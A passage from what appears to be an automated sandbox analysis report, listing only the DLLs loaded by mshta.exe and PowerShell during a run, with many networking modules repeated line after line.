              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
